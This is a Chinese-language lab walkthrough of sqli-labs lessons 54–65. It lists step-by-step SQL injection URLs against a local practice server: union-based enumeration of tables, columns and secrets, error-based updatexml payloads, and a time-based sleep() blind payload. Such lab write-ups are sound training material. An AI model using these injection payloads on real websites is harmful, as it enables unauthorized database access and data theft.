sqli-labs Less54-Less65

Less54

从第54关开始,就比较偏向实际挑战方向,这一关对输入次数进行了限制,要求在十次之内,否则刷新数据库随机更新表名列名等信息

首先判断包裹形式,这一关为单引号包裹

http://127.0.0.1/sqli-labs-master/Less-54/?id=1‘--+

 

 

 判断列数http://127.0.0.1/sqli-labs-master/Less-54/?id=1‘ order by 3--+

 

 

 查看当前数据库 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,database() --+  当前数据库为challenges

 

 

 查表 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘challenges‘--+

表名为f7fs4xzk70

 

 

 查字段 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘f7fs4xzk70‘--+   

 

 查信息 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(concat_ws(0x7e,secret_DPET))from challenges.f7fs4xzk70 --+

取出信息放入下面

 

 我们成功过关

 

 Less-55

这一关有14次机会,包裹形式为?id=1)  其他步骤均与Less54相同

Less-56

这一关包裹形式为?id=1‘) 其他步骤均与Less54相同

Less-57

这一关有14次机会,包裹形式为?id=1" 其他步骤均与Less54相同

Less-58

这一关只有五次机会,显然不能使用联合查询,这一关我们使用报错注入

有题目(刚打开的页面显示)可知,我们当前数据库为challenges

查表 http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=‘challenges‘)),1)--+   表名为v000pri418

 

 查字段  http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=‘v000pri418‘)),1)--+   

 

 查信息 http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(0x7e,secret_T5XO)from challenges.v000pri418)),1)--+

 

 通关成功

 

 Less-59

这一关没有包裹,其他均与第58关相同

Less-60

这一关的包裹形式为?id=1")  其他均与第58关相同,包裹形式不好测出,多试几次即可

Less-61

这一关的包裹形式为?id=1‘)  其他均与第58关相同,包裹形式不好测出,多试几次即可

 

Less-62

这一关给了130次机会,由此判断这一关主要使用盲注

判断包裹形式  http://127.0.0.1/sqli-labs-master/Less-62/?id=1‘) --+  此次为单引号加括号

 

 由题目可知数据库名字为challenges

测试数据库的长度

http://127.0.0.1/sqli-labs-master/Less-62/?id=1‘) if((length(database())=1),1,sleep(5)--+  立刻回显

 

 剩下的可以查看第8-10关的内容,我们也可以使用burpsuit,参考前面的第5关。

Less-63

包裹形式为?id=1‘ 在要求与方法上,本关与Less-62相同。

Less-64

包裹形式为?id=1))  在要求与方法上,本关与Less-62相同。

Less-65

包裹形式为?id=1")在要求与方法上,本关与Less-62相同。

 

相关文章